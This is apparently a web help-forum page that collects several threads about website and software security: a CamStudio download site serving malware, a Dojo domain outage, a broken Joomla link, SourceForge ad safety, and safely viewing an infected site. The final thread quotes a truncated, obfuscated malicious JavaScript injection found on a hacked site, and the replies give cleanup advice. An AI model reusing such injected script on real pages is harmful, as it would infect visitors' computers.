Is Camstudio still an active project? - video-capture

I was just trying to get a quick [free] video record of a screen (with captions), and wanted to use something I've happily used in the past - Camstudio (https://camstudio.org/), but when I go to download it I notice I'm being redirected to a suspect website (http://www.nameghesere.com).
You can't get onto the Camstudio forums without invite - so I thought I'd ask here in case anyone knows.
Has Camstudio been compromised? Is it still a viable [free] solution?
Thanks
Abe

Ah - I've found another download site for Camstudio (https://sourceforge.net/projects/camstudio/files/latest/download) which includes a warning:
Notice Regarding Malware:
The downloads from camstudio.org are known to contain malware.
All downloads from SourceForge are virus scanned. As of this writing there is no malware on the SourceForge downloads for CamStudio.
Perhaps someone should shut down the camstudio.org site.

Related

Why is dojotoolkit.org suspended?

When I go to https://dojotoolkit.org/, I get, "Unable to connect". In some browsers I get "You have reached a domain that is pending ICANN verification".
I've used a number of dojo libraries in my code. Does anyone know what happened to the owner and whether this is likely to be fixed in the near future?
If it isn't fixed, what is my best option for replacing it?
This seems to be a temporary administrative DNS issue, based on their Twitter response:
We apologize for the issues accessing the Dojo 1 web site. We’re
working on it as fast as possible. In the mean time, you can add the
IP address directly to /etc/hosts. 104.16.205.241
There are also some workarounds on the dojo gitter.im channel:
Reference guide content is also at https://github.com/dojo/docs/ And
tutorials are at
https://github.com/dojo/dojo-website/tree/master/src/documentation/tutorials
Also, as mentioned in this related question, you can use the Archive.org Wayback Machine.
The site now appears to be back up. I was able to access it and get information on features I'm using.

pdf link not working Joomla 3.5.1

I've had this site (donake.net) up for about a year. Was notified by someone that the link on one of the pages to a PDF wasn't working and a link to another page wasn't working.
When I tried logging in, it wouldn't take my username and password. I realized that I need to update the version of Joomla on my GoDaddy hosting account. Once I updated the version of Joomla to 3.5.1, I was able to login and access the admin side of Joomla. I think the site was attacked because there were a lot of "registered users" that weren't real.
One of the pages was set to unpublished, so I published it and that link started working fine.
The link "VIEW A SAMPLE of the book here" on this page - http://donake.net/just-make-me-a-sammich-book still won't work. I've re-linked the PDF. Deleted the PDF and re-uploaded it with the file name changed and nothing has worked.
One other thing is the icons in the Admin side of Joomla aren't displaying either. Not sure if all of this is tied together or not. My MAIN CONCERN is getting the link to work.
Any help would be greatful!!!!
Thanks
I had the same issue, I ended up calling our hosting company and they helped me edit the .htaccess file to include pdf in the RewriteRule (for me it was on line 3).
Hope this helps because I know it drove me mad trying to fix it.
Good luck!

Is it still safe to use Sourceforge?

I noticed some misleading ads on Sourceforge that, if downloaded, will install malware on your computer. Have Sourceforge become a dirty site?
That's not directly caused by Sourceforge. They just use Google Adsense, and somebody has uploaded a Google Adwords advertisement that picks up on the keyword "download" and shows that ad. You can use the buttons on the top right of the ad to report the ad and Google will take it down.

How do I go about safely taking a screenshot of a website that I know is infected with malware?

Background:
One of my clients' websites has become a malware infested hotbed.
Disposing of the malware has proven difficult and time consuming, and, in the meantime, we still have had to do work on the site.
For now, we went to some trouble to do our work - creating a disposable VM to just run a web browser, so we can see what the site looks like for the designers' work, for example.
I'm wondering if there's an easier (and faster) way to get an idea what the design of the site looks like. Not everyone on the project is tech savvy enough to be trusted with, for example, properly handling switching VMs.
Question:
Is there a method for safely seeing what a malware infested website looks like (for example, a service which will browse the site for me and send a screenshot), one which ideally is easy and simple enough to use that I can trust our non-tech-savvy designers to user?
You might take at look at Internet Archive: Wayback Machine to see if the site has been archived.
If a screenshot is all you need, there are several online browser simulators, such as Net Renderer (which will run any inputted web URL in a given version of Internet Explorer and then supply a screenshot). You might also try BrowserStack, which requires an account, and is not free, but does have a free trial period, and offers more than Internet Exploder.
You could also try running a browser in Sandboxie, which is simpler to set up and use than a VM (you just install it, and then use the windows right-click menu to launch any program in a sandbox of your choosing). However, it isn't free for commercial use.
I don't know if exist a standalone tool to parse a website for malwares, but I think this can help you, it's a google tool that you can you with a request and they will send you a response.
Follow the link:
http://support.google.com/webmasters/bin/answer.py?hl=en&answer=168328
Hope it helped.

Malware on the site as per google but I cannot find it

yesterday when I came to one of my sites I got a warning from google that there is malware on my site. I looked at the code and there was indeed some javascript that shouldn't be there. I googled it and didn't find anything usefull. When I came back to my site, that code was gone, but google (when accessing the site from the search engine) and google chrome still give me a warning that there is malware on my site.
I looked at webmaster tools and they have identified few pages as problematic. One of them is http://www.keramikfliesen.com/schweiz/rimini/. The code that is listed in the webmaster tools under Malware is:
<script type='text/javascript'>st="no3nen0orno3pno3rxstxpno3
rxnl";Date&&(a=["a#%d]%b#%e_%c)%1<%5*%4+%9:%3^%2","%7!%0|%f~
%8?%6&"]);var b=[],c="&!^<^]$$&)&~&_&)!:$$^#$|&:&&$?$]^<^]^]
&+&~&^!*&]&*&_!+$_&^&~&~&#&:&*$_&:&_&+&*!?+~&&$?&!^<$:$:!#!?
^+^]^!^$+*^&^#!&&<!$$|&^^]&_&*!!$|++&<!+&*^#&^$_!^&*!+*+&:&]
&*$?&^$_&!&*!+*+&:&]&*$?$:$:^#&*&+^]&_&*!!$|++&<!+&*$?&^$_&!
&*!+*+&:&]&*$?$:$#!?^+$:^#&+&~&^!*&]&*&_!+$_&^&~&~&#&:&*^]&!
^<$#$$^]$$$#&*!^&^&<!|&*$?&*&+$_!+&~+!+]*+*^!+!$&:&_&!$?$:$:
$#$$^#&*!?!|&:!$&*!^^]$$$#&*&+$_!+&~+!+]*+*^!+!$&:&_&!$?$:$#
$$^#!|&<!+&?^]$~$$^#&!^^^]$$&?!+!+!|^#$~$~$$$#!^!+$_!$&*!|&)
&<&^&*$?$~&*&_^|$~&!$)$$&!$$$:$_!$&*!|&)&<&^&*$?$~&_&~^^$~&!
$)$$&*$$$:$_!$&*!|&)&<&^&*$?$~!|&*!$!?$~&!$)$$$_$$$:$#$$$~!+
&~!|^$$_&?!+&]&)$$^#!&&<!$$|&+^]$]^<$<^]&_&<!&&:&!&<!+&~!$$_
!*!^&*!$+<&!&*&_!+$_!+&~+)&~!!&*!$+^&<!^&*$?$:$_&:&_&+&*!?+~
&&$?$$&&&:!$&*&&&~!?$$$:$)&*^]$$^<$$$)&?^]&&!*&_&^!+&:&~&_$?
$:!#!]^#&?$_!|!$&~!+&~!+!:!|&*^]!#&$^#&&!*&_&^!+&:&~&_$?$:!#
!$&*!+!*!$&_$|&!^^!]$)&<^#&&!*&_&^!+&:&~&_$?$:!#!&&<!$$|&&^]
&+&~
Can you please help me out? How should I fight this?
Thank you all very much for your help in advance!
Remove the malware from your webpages.
Immediately change your passwords.
Also check for any XSS (cross-site scripting) and SQL injection vulnerabilities.
deactivate plugins that are not high ranked or from reputed source.
Use secure protocols.check out StopBadware.org's Tips for Cleaning and Securing Your Website.
Keep an eye on your log files.
Stay up-to-date with the latest software updates and patches.
Hope it helps!
If the code appears again, then the attacker left some script, which, on request, runs the infecting procedure. Usually this script receives an encoded string of the malcode (e.g. in base64), decodes it and executes via eval(). You should find this file (it is most likely a PHP script) and remove it. To find it look at the log and search for suspicious requests (e.g. a single POST request, transmitting base64 string is a very suspicious one).
Most probably your hosting has been compromised (password stolen) by an automated tool.
This tools typically inject some javascript inside js files in order to infect the people visiting your pages with malware. You should :
Change your passwords.
Restore the most recent non compromised backup.